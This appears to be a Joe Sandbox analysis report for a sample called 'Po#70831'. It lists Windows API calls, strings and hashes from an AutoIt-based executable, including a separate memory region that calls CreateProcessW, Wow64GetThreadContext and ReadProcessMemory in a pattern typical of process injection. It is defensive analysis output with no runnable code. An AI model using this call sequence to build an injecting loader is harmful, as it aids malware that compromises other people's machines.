                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: f7a689cf4bc32cbdf50a56ffc9e1788228f291d2c52f61a99ed25537bdc22446
                                      • Instruction ID: a4fa8c44bdc7af9e7ba7a526cb4e76da6d00b2a5170d6cad5f4529fd57ea3d59
                                      • Opcode Fuzzy Hash: f7a689cf4bc32cbdf50a56ffc9e1788228f291d2c52f61a99ed25537bdc22446
                                      • Instruction Fuzzy Hash: 07117C74200700FFEB258B65DC48F2B7FB9FFD6B91F2081AAF40296290DB71D8069620

                                      APIs
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00492B6B
                                        • Part of subcall function 00493A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00561418,?,00492E7F,?,?,?,00000000), ref: 00493A78
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00552224), ref: 004D2C10
                                      • ShellExecuteW.SHELL32(00000000,?,?,00552224), ref: 004D2C17
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                      • String ID: runas
                                      • API String ID: 448630720-4000483414
                                      • Opcode ID: 0c6ee2ccee0d90a8b0dbf84bbd471a9ccf2961f56748b08e8aedbefe41148655
                                      • Instruction ID: 161c07e487ba8d61d2e8f2b77e0026c0e0fde7f48322d30c7b3b1ddda819e104
                                      • Opcode Fuzzy Hash: 0c6ee2ccee0d90a8b0dbf84bbd471a9ccf2961f56748b08e8aedbefe41148655
                                      • Instruction Fuzzy Hash: 5711C0311083016ACF14FF65D96197E7FE4AFA274AF48043FF542431A2DFA99A0AD71A
                                      APIs
                                      • lstrlenW.KERNEL32(?,004D5222), ref: 004FDBCE
                                      • GetFileAttributesW.KERNELBASE(?), ref: 004FDBDD
                                      • FindFirstFileW.KERNELBASE(?,?), ref: 004FDBEE
                                      • FindClose.KERNEL32(00000000), ref: 004FDBFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                      • String ID:
                                      • API String ID: 2695905019-0
                                      • Opcode ID: 5e1aed7ba78c9829e3937238957cd4ba210a6bac7449aeb6f5098287e26f4636
                                      • Instruction ID: 0b49f9d4c9b3b079279f5091897f534552a6cac079f4fb3288d296db65bcdd74
                                      • Opcode Fuzzy Hash: 5e1aed7ba78c9829e3937238957cd4ba210a6bac7449aeb6f5098287e26f4636
                                      • Instruction Fuzzy Hash: 16F0A0308109189782306B78AC0E8BF3B6D9F62334B104703F9B6C21E1EBB4595AD6DA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: p#V
                                      • API String ID: 3964851224-2534486754
                                      • Opcode ID: f1d5b166aba7e72027e43bd60797274f15ca3d613ead11713c2c1f92a3108ba0
                                      • Instruction ID: 114ff20517d25703b8d588c9b8e4634df854737b211d552e0d2f3a29a7d3fbc4
                                      • Opcode Fuzzy Hash: f1d5b166aba7e72027e43bd60797274f15ca3d613ead11713c2c1f92a3108ba0
                                      • Instruction Fuzzy Hash: 1FA26E706083419FDB10DF15C480B2BBBE1BF99304F14896EE89A9B352D779EC45CB9A
                                      APIs
                                      • GetInputState.USER32 ref: 0049D807
                                      • timeGetTime.WINMM ref: 0049DA07
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0049DB28
                                      • TranslateMessage.USER32(?), ref: 0049DB7B
                                      • DispatchMessageW.USER32(?), ref: 0049DB89
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0049DB9F
                                      • Sleep.KERNEL32(0000000A), ref: 0049DBB1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                      • String ID:
                                      • API String ID: 2189390790-0
                                      • Opcode ID: 333d7419845b73e7dc64abe0dcbdf688c7aa36d1496095eb0435ec5f1e3e1a96
                                      • Instruction ID: 7bc13bceb9c0fcb934bf34a86c4ca66a8e828cbf991dbaaa4dae8331d4468341
                                      • Opcode Fuzzy Hash: 333d7419845b73e7dc64abe0dcbdf688c7aa36d1496095eb0435ec5f1e3e1a96
                                      • Instruction Fuzzy Hash: 24420370A04681DFDB38DF25C844B6ABBE4BF56304F14462FE45687391D7B8E849CB8A

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00492D07
                                      • RegisterClassExW.USER32(00000030), ref: 00492D31
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00492D42
                                      • InitCommonControlsEx.COMCTL32(?), ref: 00492D5F
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00492D6F
                                      • LoadIconW.USER32(000000A9), ref: 00492D85
                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00492D94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: 110e555ec09d25b415466ad733b5d31bc71e0ba2f766557d0fca0cb1ef022ac2
                                      • Instruction ID: 224dd4db3da47121bdcd6dae6fc184e8a152f396600508a8a99fc49a791f8a31
                                      • Opcode Fuzzy Hash: 110e555ec09d25b415466ad733b5d31bc71e0ba2f766557d0fca0cb1ef022ac2
                                      • Instruction Fuzzy Hash: 6A21E3B1901618AFDB10DFA8E849BEDBFB4FB29701F04811AF511A72A0D7B10548EF95

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .K
                                      • API String ID: 0-1219020502
                                      • Opcode ID: 3180716a972957932cfec10eccb90ea82651cb0eb1fd48897135eff960b4698c
                                      • Instruction ID: 8e647bc8caf4af1242bc2071a9fb9490b4d14e78aa0aeec602b25d58401f48fa
                                      • Opcode Fuzzy Hash: 3180716a972957932cfec10eccb90ea82651cb0eb1fd48897135eff960b4698c
                                      • Instruction Fuzzy Hash: 52C10378904249AFCB51DFAAC845FEEBFB0AF19310F04409EE414A7392C7798D42CB69

                                      APIs
                                        • Part of subcall function 004D039A: CreateFileW.KERNELBASE(00000000,00000000,?,004D0704,?,?,00000000,?,004D0704,00000000,0000000C), ref: 004D03B7
                                      • GetLastError.KERNEL32 ref: 004D076F
                                      • __dosmaperr.LIBCMT ref: 004D0776
                                      • GetFileType.KERNELBASE(00000000), ref: 004D0782
                                      • GetLastError.KERNEL32 ref: 004D078C
                                      • __dosmaperr.LIBCMT ref: 004D0795
                                      • CloseHandle.KERNEL32(00000000), ref: 004D07B5
                                      • CloseHandle.KERNEL32(?), ref: 004D08FF
                                      • GetLastError.KERNEL32 ref: 004D0931
                                      • __dosmaperr.LIBCMT ref: 004D0938
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175

                                      APIs
                                        • Part of subcall function 00493A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00561418,?,00492E7F,?,?,?,00000000), ref: 00493A78
                                        • Part of subcall function 00493357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00493379
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0049356A
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004D318D
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004D31CE
                                      • RegCloseKey.ADVAPI32(?), ref: 004D3210
                                      • _wcslen.LIBCMT ref: 004D3277
                                      • _wcslen.LIBCMT ref: 004D3286
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                      • API String ID: 98802146-2727554177

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00492B8E
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00492B9D
                                      • LoadIconW.USER32(00000063), ref: 00492BB3
                                      • LoadIconW.USER32(000000A4), ref: 00492BC5
                                      • LoadIconW.USER32(000000A2), ref: 00492BD7
                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00492BEF
                                      • RegisterClassExW.USER32(?), ref: 00492C40
                                        • Part of subcall function 00492CD4: GetSysColorBrush.USER32(0000000F), ref: 00492D07
                                        • Part of subcall function 00492CD4: RegisterClassExW.USER32(00000030), ref: 00492D31
                                        • Part of subcall function 00492CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00492D42
                                        • Part of subcall function 00492CD4: InitCommonControlsEx.COMCTL32(?), ref: 00492D5F
                                        • Part of subcall function 00492CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00492D6F
                                        • Part of subcall function 00492CD4: LoadIconW.USER32(000000A9), ref: 00492D85
                                        • Part of subcall function 00492CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00492D94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 0049BB4E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID: p#V$p#V$p#V$p#V$p%V$p%V$x#V$x#V
                                      • API String ID: 1385522511-1690925405

                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0049316A,?,?), ref: 004931D8
                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,0049316A,?,?), ref: 00493204
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00493227
                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0049316A,?,?), ref: 00493232
                                      • CreatePopupMenu.USER32 ref: 00493246
                                      • PostQuitMessage.USER32(00000000), ref: 00493267
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: D%V$D%V$D%V$D%V$D%VD%V$Variable must be of type 'Object'.
                                      • API String ID: 0-4149449166

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 036D26C1
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 036D28E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2377113128.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_36d0000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0

                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00492C91
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00492CB2
                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00491CAD,?), ref: 00492CC6
                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00491CAD,?), ref: 00492CCF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399

                                      APIs
                                        • Part of subcall function 036D22A0: Sleep.KERNELBASE(000001F4), ref: 036D22B1
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 036D24E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2377113128.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_36d0000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: 22LSKX34X1ZS7UF4T82G3BYZV
                                      • API String ID: 2694422964-2028676936

                                      APIs
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00502C05
                                      • DeleteFileW.KERNEL32(?), ref: 00502C87
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00502C9D
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00502CAE
                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00502CC0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: File$Delete$Copy
                                      • String ID:
                                      • API String ID: 3226157194-0
                                      • Opcode ID: d212e516231399eb32f03720b119baaf11ab14ac1c2780aea2940cff07d77a41
                                      • Instruction ID: 9ea0a122d01245ef10d930dc8e5f09a79134309c9c9e2eaffa3e3dfb4212c7e3
                                      • Opcode Fuzzy Hash: d212e516231399eb32f03720b119baaf11ab14ac1c2780aea2940cff07d77a41
                                      • Instruction Fuzzy Hash: 99B17F71D00119ABDF21DBA5CC89EDEBB7DFF49354F1040AAFA09E6181EA349E448F64

                                      Control-flow Graph (figure omitted; nodes reference WriteFile and GetLastError)
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: JOI
                                      • API String ID: 0-4205673466
                                      • Opcode ID: 99c0880efa50d9877eb99eb201b208ea62f5a40909b71fcaa93cff9d8bb87d68
                                      • Instruction ID: dfc0771778536dc886536389f1178f1f1cb9eaffa6b901f2c889bb77278c7a9d
                                      • Opcode Fuzzy Hash: 99c0880efa50d9877eb99eb201b208ea62f5a40909b71fcaa93cff9d8bb87d68
                                      • Instruction Fuzzy Hash: 7251E079900609AFCB649FA9CC45FEFBFB4AF05314F10005FF404A7292D679A982DB69
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00493B0F,SwapMouseButtons,00000004,?), ref: 00493B40
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00493B0F,SwapMouseButtons,00000004,?), ref: 00493B61
                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00493B0F,SwapMouseButtons,00000004,?), ref: 00493B83
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: 12735d695d0492558284eb8d5aeb14ff84e32df10a172b5f9ec20bcd60d7c5fc
                                      • Instruction ID: f2f467cb343702c32d4cd964c04ca5995747d5153b784b9b80c6c6382181961b
                                      • Opcode Fuzzy Hash: 12735d695d0492558284eb8d5aeb14ff84e32df10a172b5f9ec20bcd60d7c5fc
                                      • Instruction Fuzzy Hash: 96115AB5510208FFDF208FA4DC48EAFBBB8EF02749B10446AA805D7211D231AE45A7A4
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 036D1A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036D1AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036D1B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2377113128.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_36d0000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                      • Instruction ID: c300c9b42725e6341e9885a8d4ea16e890cf23af553768fe713799898de1cc50
                                      • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                      • Instruction Fuzzy Hash: A762F834E14258DBEB24CBA4C850BDEB376EF59300F1091A9D10DEB394E7B99E81CB59
                                      APIs
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004D33A2
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00493A04
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_wcslen
                                      • String ID: Line:
                                      • API String ID: 2289894680-1585850449
                                      • Opcode ID: 35318f983ef5d160f856def4d2254fbe784cdd37ccda7148af1cfaf1c488b516
                                      • Instruction ID: 99d89a8c762eb68755fec43f1932f9c56b90a1394c41192be2d2748d6ba607aa
                                      • Opcode Fuzzy Hash: 35318f983ef5d160f856def4d2254fbe784cdd37ccda7148af1cfaf1c488b516
                                      • Instruction Fuzzy Hash: 0331E6715083006ACB20EF24DC45BEB7BD8AB51719F04493FF49983291DB789A49C7CA
                                      APIs
                                      • GetOpenFileNameW.COMDLG32(?), ref: 004D2C8C
                                        • Part of subcall function 00493AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00493A97,?,?,00492E7F,?,?,?,00000000), ref: 00493AC2
                                        • Part of subcall function 00492DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00492DC4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Name$Path$FileFullLongOpen
                                      • String ID: X$`eU
                                      • API String ID: 779396738-2857220807
                                      • Opcode ID: aeef98a5f76c149f6c4c46776e80f9f1996a80d3281e45f66970308bb009f36b
                                      • Instruction ID: 80441e5a01473c0ea12bf16868c86751e1b25494ccc55e18773ff452863981e6
                                      • Opcode Fuzzy Hash: aeef98a5f76c149f6c4c46776e80f9f1996a80d3281e45f66970308bb009f36b
                                      • Instruction Fuzzy Hash: 4A21A471A00298AECF019F95C855BEE7FF8AF49305F40406BE405A7341DBF859498B65
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004B0668
                                        • Part of subcall function 004B32A4: RaiseException.KERNEL32(?,?,?,004B068A,?,00561444,?,?,?,?,?,?,004B068A,00491129,00558738,00491129), ref: 004B3304
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004B0685
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: Unknown exception
                                      • API String ID: 3476068407-410509341
                                      • Opcode ID: 2ec1009ae868391628ab1872dc515cb5a0de346c09134c17a4a2713c57f125a9
                                      • Instruction ID: 6e5fd265bfcf449e73c0132c68048c626a03369a2f80f981ca53e20c46f02ef8
                                      • Opcode Fuzzy Hash: 2ec1009ae868391628ab1872dc515cb5a0de346c09134c17a4a2713c57f125a9
                                      • Instruction Fuzzy Hash: BFF0283080020C738F04BAA6D846CDF7B6CAE50305B604037B814915D2EF39DA1AC6A8
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0050302F
                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00503044
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: 3714fad22d7e58f7173adf055a0603305d0e6826e8da90fdb8f7e7732a374384
                                      • Instruction ID: c7cec1bb04099c2205ca9e28bfc8afdcb9f0aa75f036ebd91f25baa82466edd0
                                      • Opcode Fuzzy Hash: 3714fad22d7e58f7173adf055a0603305d0e6826e8da90fdb8f7e7732a374384
                                      • Instruction Fuzzy Hash: F8D05B75500314A7DA3097949C0DFCB3E6CDF05751F4001917695D2091DEB09549CAD0
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 005182F5
                                      • TerminateProcess.KERNEL32(00000000), ref: 005182FC
                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 005184DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFreeLibraryTerminate
                                      • String ID:
                                      • API String ID: 146820519-0
                                      • Opcode ID: 86c3c6fc2334567464a5cee1e116e20fc73b38f6923c4c4fa577c0f640693c50
                                      • Instruction ID: 7a8119b2a30eec5b68bb1ea424432b23e6279d9005348b9f92a587c8ba831a0c
                                      • Opcode Fuzzy Hash: 86c3c6fc2334567464a5cee1e116e20fc73b38f6923c4c4fa577c0f640693c50
                                      • Instruction Fuzzy Hash: 46128E719083019FD720DF28C484B6ABBE1FF89318F04895DE8998B252DB34ED85CF92
                                      APIs
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00491BF4
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00491BFC
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00491C07
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00491C12
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00491C1A
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00491C22
                                        • Part of subcall function 00491B4A: RegisterWindowMessageW.USER32(00000004,?,004912C4), ref: 00491BA2
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0049136A
                                      • OleInitialize.OLE32 ref: 00491388
                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 004D24AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                      • String ID:
                                      • API String ID: 1986988660-0
                                      • Opcode ID: 316d346fac7616a18aaacd0fc3a10fc7ad3d532c3c8fa40c0505db6a2f4ef1c4
                                      • Instruction ID: 64d59e37b6ae8cdec01861aaf85079787786c3f9c96179ffc0574e64351a6d9e
